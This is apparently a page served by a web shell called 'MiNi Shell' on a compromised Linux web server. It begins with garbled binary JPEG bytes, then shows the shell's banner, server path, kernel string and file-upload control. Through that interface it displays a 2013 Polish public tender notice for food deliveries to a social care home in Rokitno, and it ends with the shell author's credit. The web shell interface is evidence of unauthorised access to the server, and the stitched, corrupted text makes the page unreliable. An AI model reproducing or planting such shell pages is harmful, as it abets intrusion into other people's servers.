JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131118/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131118/468482-N-2013.html

<p class="kh_header"><b>Rokitno: Dom Pomocy Społecznej w Rokitnie nr 38 ogłasza przetarg nieograniczony 
na sprzedaż i dostawę produktów spożywczych do Domu Pomocy Społecznej 
w Rokitnie Nr 38 w 2014r.</b><br>
<b>Numer ogłoszenia: 468482 - 2013; data zamieszczenia: 18.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dom Pomocy Społecznej , Rokitno 38, 66-340 Rokitno, woj. lubuskie, tel. 0-95 7493059, faks 0-95 7493059.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.miedzyrzecz.dps3.bip.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dom Pomocy Społecznej w Rokitnie nr 38 ogłasza przetarg nieograniczony 
na sprzedaż i dostawę produktów spożywczych do Domu Pomocy Społecznej 
w Rokitnie Nr 38 w 2014r..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część A - dostawa mięsa i wędlin wieprzowych          CPV 15100000-9
1.		blok szynkowy	kg	70
2.		boczek wędzony parzony	kg	140
3.		boczek faszerowany	kg	100
4.		flaki gotowane	kg	60
5.		Karkówka bez kości	kg	150
6.		Kaszanka (gruba)	kg	240
7.		kiełbasa zwyczajna  	kg	600
8.		kiełbasa biała	kg	24
9.		kiełbasa słoikowa	kg	100
10.		kiełbasa piwna	kg	60
11.		serdelki 	kg	240
12.		kiełbasa śląska	kg	160
13.		kiełbasa metka łososiowa	kg	150
14.		kiełbasa mortadela	kg	100
15.		kiełbasa parówkowa	kg	150
16.		kiełbasa zielonogórska 	kg	100
17.		kiełbasa kanapkowa	kg	100
18.		kiełbasa żywiecka	kg	 80
19.		Kości ze schabu	kg	400
20.		łopatka z przyprawami	kg	40
21.		mięso gulaszowi wieprzowe	kg	350
22.		mięso mielone z łopatki	kg	400
23.		Schab bez kości	kg	90
24.		słonina	kg	10
25.		smalec	kg	30
26.		szynka gotowana	kg	20
27.		szynka mielona	kg	15
28.		wątroba wieprzowa	kg	100
29.		wątrobianka	kg	60
30.		żeberka	kg	200
31.		pieczeń rzymska	kg	120
32.		salceson	kg	140

Część  B - dostawa drobiu świeżego                             CPV 15112100-7
1.		filet drobiowy	kg	300
2.		wątróbka drobiowa	kg	120
3.		porcje rosołowe	kg	200
4.		kurczak	kg	300
5.		udka z kurczaka	kg	320
6.		drobiowe gulaszowe	kg	120

Część  C - dostawa nabiału                                            CPV 15510000-6
 1.		Drożdże 	kg	10 
2.		Jogurt naturalny	150g/sz	140
3.		Jogurt owocowy 	150 g/szt	3 500
4.		Margaryna  zwykła  250g	kg	250
5.		Masło -mix 200g	kg

	300


6.		Masło extra nie mniej niż 82 % tłuszczu	kg	300
7.		Masło roślinne500g	kg	500
8.		Mleko 2 %  folia	  1 l	 6000
9.		Maślaka  	 1 l	400
10.		Mleko w proszku	kg	500
11.		Ser biały półtłusty	1kg	550  
12.		Serek topiony	1kg	250
13.		Śmietana 12 % w opakowaniach 370g	    szt.	       800
14.		Ser żółty	kg	300
15.		Śmietana 30% w opakowaniach 250g	szt.	90
16.		Serek homogenizowany waniliowy 125g	szt.300

Część D - dostawa pieczywa 	         CPV 15810000-9
1	Chleb baltonowski (krojony)	1kg	5 200
2	Chleb razowy graham (krojony)	1kg	4 500
3	Bułka pszenna mała 	50g	35 000
4	Bułka maślana    	50g	1500       
5	Bułka tarta               	1 kg 	 90   
6 	Drożdżówka                 	 100 g	1 500
7	Pączki z marmoladą i lukrem	 50g	1 500

Część E- dostawa ryb 			          CPV 15220000-6
1	Filet z mintaja (tafla)	kg	180
2	Filety z PANGI                     	kg 	180
3	Makrela wędzona 	kg	150
4	Śledź matyjas    	kg	160

Część F - dostawa mrożonek                                        CPV  15331170-9
1	Pierogi z mięsem 	kg	150
2	Lody zimne 150g	szt	1800
3	Marchewka mrożona 	kg	150
4	Mieszanka warzywna	kg	400
5	Pierogi ruskie      	kg	400
6	Włoszczyzna paski 	kg	200

Część G- dostawa artykułów spożywczych suchych    CPV  15000000-8
1.	Budyń z cukrem  60g	szt	 1300
2.	Chrupki kukurydziane 80g	szt	1400
3.	Chrzan    160g 	szt	170
4	Cukier  1 kg	kg	1600  
5	Cukier waniliowy  32g  	szt	180
6	Cukier puder 0,5 kg	szt.	20
7	Cynamon 20g                 	szt	35 
8	Dżem    270g           	szt 	600
9	Fasola czerwona konserwowa 380g	szt 	130
10	Fasola konserwowa szparagowa 520ml	szt	100
11	Fasola sucha (duża) 400g	szt	 170
12	Fasola sucha drobna 400g	szt	40
13	Groch łuskany    400 g     	szt	150
14	Groszek konserwowy 380g	szt	150
15	Przyprawa GYROS 30g	szt	100
16	Herbata owocowa w saszetkach (20 torebek w opakowaniu)	Opak.	600
17	Herbata zwykła w saszetkach (100szt w opak.)	Opak.	300
18	Jarzynka w proszku 200g	szt	340
19	Kakao             200g	szt	100
20	Kasza jęczmienna 1kg	kg 	210
22	Kaszka kukurydziana 400g	Szt   	200
23	Kaszka manna   1kg	kg 	150
24	Kaszka ryżowa    230g	szt	150
25	Kawa zbożowa   500 g	szt	140
26	Ketczup           480g 	szt	450
27	Kisiel  z cukrem 77g	szt	1100
28	Koncentrat pomidorowy o zaw. pomidorów nie mniej niż 30%  900ml	
szt	300
29	Konserwa rybna   180g	szt	50
30	Kostka rosołowa  (6 sztuk w opakowaniu)	Opak. 	250
31	Krem czekoladopodobny 
o zawartości kakao nie mniej niż (7,4%) 180g	szt	110
32	Kukurydza konserwowa   380g	szt	320 
33	Kwasek cytrynowy   20g   	szt	800
34	Liść laurowy    6g	szt	90
35	Lody ciepłe             	szt	800
36	Przyprawa do zup w płynie 750ml	szt 	170
37	Majeranek       15g	szt	180
38	Majonez o zawartości o zawartości żółtek nie mniej niż 6%  poj. 700g	

szt   	

200
39	Makaron świderki 1 kg	kg 	200
40	Makaron muszelki     1kg 	kg 	200
41	Makaron nitka rosołowa 1kg	kg    	 80
42	Mąka pszenna 1kg	kg 	900
43	Mąka ziemniaczana  1kg	kg	50
44	Miód prawdziwy         380g	szt	150
45	Musztarda 190g	szt	300
46	Ogórki konserwowe    900g	szt	350
47	Olej rzepakowy 1litr	1 litr	400
48	Otręby pszenne 1 kg	kg 	20
49	Papryka konserwowa 820 g	szt	300
50	Papryka sucha 20g	szt	200
51	Paprykarz 300g	szt	450
52	Pasztet drobiowy 195g	szt	250
53	Pieprz            20g	szt	750
54	Płatki kukurydziane 1 kg	kg 	300
55	Płatki owsiane      1kg	kg 	100
56	Proszek do pieczenia 36g	szt	70 
57	Rodzynki          100g	szt	150
58	Ryż    1kg	kg 	300
59	Sałatka szwecka   900g	szt	200
60	Sok owocowy 2litry	szt	200
61	Sól            1kg	1kg 	360
62	Syrop owocowy 500ml	szt	400
63	Wafle nadziewane	kg	100
64	Wafle dla diabetyków	kg 	 10
65	Ciastka kruche 1kg	kg 	100
66	Ziele angielskie 15g	szt	100
67	Zupy grzybowe      45g	szt	650
68	Żurek w proszku 49g	szt 	600
69	Szczaw          380g 	szt	 60.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (teks jednolity Dz.U. z 2013 poz. 907).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (teks jednolity Dz.U. z 2013 poz. 907).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (teks jednolity Dz.U. z 2013 poz. 907).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (teks jednolity Dz.U. z 2013 poz. 907).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie złożone na podstawie art. 24 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych (teks jednolity Dz.U. z 2013 poz. 907).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>



<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.miedzyrzecz.dps3.bip.net.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ADMINISTRACJA DOMU POMOCY SPOŁECZNEJ w ROKITNIE NR 38 
66-340 Przytoczna, woj. lubuskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 29.11.2013 godzina 09:30, miejsce: Dom Pomocy Społecznej w Rokitnie Nr 38
66-340 Przytoczna, woj. lubuskie 
ADMINISTRACJA.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> cZĘŚĆ A - dostawa mięsa i wędlin wieprzowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		blok szynkowy	kg	70
2.		boczek wędzony parzony	kg	140
3.		boczek faszerowany	kg	100
4.		flaki gotowane	kg	60
5.		Karkówka bez kości	kg	150
6.		Kaszanka (gruba)	kg	240
7.		kiełbasa zwyczajna  	kg	600
8.		kiełbasa biała	kg	24
9.		kiełbasa słoikowa	kg	100
10.		kiełbasa piwna	kg	60
11.		serdelki 	kg	240
12.		kiełbasa śląska	kg	160
13.		kiełbasa metka łososiowa	kg	150
14.		kiełbasa mortadela	kg	100
15.		kiełbasa parówkowa	kg	150
16.		kiełbasa zielonogórska 	kg	100
17.		kiełbasa kanapkowa	kg	100
18.		kiełbasa żywiecka	kg	 80
19.		Kości ze schabu	kg	400
20.		łopatka z przyprawami	kg	40
21.		mięso gulaszowi wieprzowe	kg	350
22.		mięso mielone z łopatki	kg	400
23.		Schab bez kości	kg	90
24.		słonina	kg	10
25.		smalec	kg	30
26.		szynka gotowana	kg	20
27.		szynka mielona	kg	15
28.		wątroba wieprzowa	kg	100
29.		wątrobianka	kg	60
30.		żeberka	kg	200
31.		pieczeń rzymska	kg	120
32.		salceson	kg	140.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część  B - dostawa drobiu świeżego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		filet drobiowy	kg	300
2.		wątróbka drobiowa	kg	120
3.		porcje rosołowe	kg	200
4.		kurczak	kg	300
5.		udka z kurczaka	kg	320
6.		drobiowe gulaszowe	kg	120.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.11.21.00-7.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Część  C - dostawa nabiału.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.		Drożdże 	kg	10 
2.		Jogurt naturalny	150g/sz	140
3.		Jogurt owocowy 	150 g/szt	3 500
4.		Margaryna  zwykła  250g	kg	250
5.		Masło -mix 200g	kg

	300


6.		Masło extra nie mniej niż 82 % tłuszczu	kg	300
7.		Masło roślinne500g	kg	500
8.		Mleko 2 %  folia	  1 l	 6000
9.		Maślaka  	 1 l	400
10.		Mleko w proszku	kg	500
11.		Ser biały półtłusty	1kg	550  
12.		Serek topiony	1kg	250
13.		Śmietana 12 % w opakowaniach 370g	    szt.	       800
14.		Ser żółty	kg	300
15.		Śmietana 30% w opakowaniach 250g	szt.	90
16.		Serek homogenizowany waniliowy 125g	szt.300.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.51.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Część D - dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Chleb baltonowski (krojony)	1kg	5 200
2	Chleb razowy graham (krojony)	1kg	4 500
3	Bułka pszenna mała 	50g	35 000
4	Bułka maślana    	50g	1500       
5	Bułka tarta               	1 kg 	 90   
6 	Drożdżówka                 	 100 g	1 500
7	Pączki z marmoladą i lukrem	 50g	1 500.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Część E- dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Filet z mintaja (tafla)	kg	180
2	Filety z PANGI                     	kg 	180
3	Makrela wędzona 	kg	150
4	Śledź matyjas    	kg	160.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.22.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Część F - dostawa mrożonek.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1	Pierogi z mięsem 	kg	150
2	Lody zimne 150g	szt	1800
3	Marchewka mrożona 	kg	150
4	Mieszanka warzywna	kg	400
5	Pierogi ruskie      	kg	400
6	Włoszczyzna paski 	kg	200.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.31.11.70-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Część G- dostawa artykułów spożywczych suchych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Budyń z cukrem  60g	szt	 1300
2.	Chrupki kukurydziane 80g	szt	1400
3.	Chrzan    160g 	szt	170
4	Cukier  1 kg	kg	1600  
5	Cukier waniliowy  32g  	szt	180
6	Cukier puder 0,5 kg	szt.	20
7	Cynamon 20g                 	szt	35 
8	Dżem    270g           	szt 	600
9	Fasola czerwona konserwowa 380g	szt 	130
10	Fasola konserwowa szparagowa 520ml	szt	100
11	Fasola sucha (duża) 400g	szt	 170
12	Fasola sucha drobna 400g	szt	40
13	Groch łuskany    400 g     	szt	150
14	Groszek konserwowy 380g	szt	150
15	Przyprawa GYROS 30g	szt	100
16	Herbata owocowa w saszetkach (20 torebek w opakowaniu)	Opak.	600
17	Herbata zwykła w saszetkach (100szt w opak.)	Opak.	300
18	Jarzynka w proszku 200g	szt	340
19	Kakao             200g	szt	100
20	Kasza jęczmienna 1kg	kg 	210
22	Kaszka kukurydziana 400g	Szt   	200
23	Kaszka manna   1kg	kg 	150
24	Kaszka ryżowa    230g	szt	150
25	Kawa zbożowa   500 g	szt	140
26	Ketczup           480g 	szt	450
27	Kisiel  z cukrem 77g	szt	1100
28	Koncentrat pomidorowy o zaw. pomidorów nie mniej niż 30%  900ml	
szt	300
29	Konserwa rybna   180g	szt	50
30	Kostka rosołowa  (6 sztuk w opakowaniu)	Opak. 	250
31	Krem czekoladopodobny 
o zawartości kakao nie mniej niż (7,4%) 180g	szt	110
32	Kukurydza konserwowa   380g	szt	320 
33	Kwasek cytrynowy   20g   	szt	800
34	Liść laurowy    6g	szt	90
35	Lody ciepłe             	szt	800
36	Przyprawa do zup w płynie 750ml	szt 	170
37	Majeranek       15g	szt	180
38	Majonez o zawartości o zawartości żółtek nie mniej niż 6%  poj. 700g	

szt   	

200
39	Makaron świderki 1 kg	kg 	200
40	Makaron muszelki     1kg 	kg 	200
41	Makaron nitka rosołowa 1kg	kg    	 80
42	Mąka pszenna 1kg	kg 	900
43	Mąka ziemniaczana  1kg	kg	50
44	Miód prawdziwy         380g	szt	150
45	Musztarda 190g	szt	300
46	Ogórki konserwowe    900g	szt	350
47	Olej rzepakowy 1litr	1 litr	400
48	Otręby pszenne 1 kg	kg 	20
49	Papryka konserwowa 820 g	szt	300
50	Papryka sucha 20g	szt	200
51	Paprykarz 300g	szt	450
52	Pasztet drobiowy 195g	szt	250
53	Pieprz            20g	szt	750
54	Płatki kukurydziane 1 kg	kg 	300
55	Płatki owsiane      1kg	kg 	100
56	Proszek do pieczenia 36g	szt	70 
57	Rodzynki          100g	szt	150
58	Ryż    1kg	kg 	300
59	Sałatka szwecka   900g	szt	200
60	Sok owocowy 2litry	szt	200
61	Sól            1kg	1kg 	360
62	Syrop owocowy 500ml	szt	400
63	Wafle nadziewane	kg	100
64	Wafle dla diabetyków	kg 	 10
65	Ciastka kruche 1kg	kg 	100
66	Ziele angielskie 15g	szt	100
67	Zupy grzybowe      45g	szt	650
68	Żurek w proszku 49g	szt 	600
69	Szczaw          380g 	szt	 60.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.80.00.00-6, 15.00.00.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com